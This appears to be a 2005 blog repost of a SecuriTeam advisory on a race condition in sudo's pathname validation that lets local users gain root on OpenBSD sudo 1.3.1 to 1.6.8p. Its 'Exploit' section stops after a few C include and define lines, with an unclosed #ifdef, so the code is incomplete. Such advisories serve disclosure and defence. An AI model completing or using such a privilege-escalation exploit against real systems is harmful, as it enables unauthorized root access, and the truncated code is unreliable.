Search This Blog

Wednesday, July 06, 2005

[UNIX] sudo Pathname Validation Race Condition (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

sudo Pathname Validation Race Condition (Exploit)
------------------------------------------------------------------------

SUMMARY

sudo (superuser do) is "a program written for UNIX, Linux, and similar
operating systems that allows users to run programs in the guise of
another user (normally in the guise of the system's superuser)". A race
condition in sudo whenever it tries to validates file pathname allows
local attackers to gain elevated privileges.

DETAILS

Vulnerable Systems:
* OpenBSD sudo versions 1.3.1 - 1.6.8p

Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sysexits.h>
#include <sys/wait.h>

#define SUDO "/usr/bin/sudo"
#ifdef BUFSIZ
#undef BUFSIZ
#define BUFSIZ 128

No comments: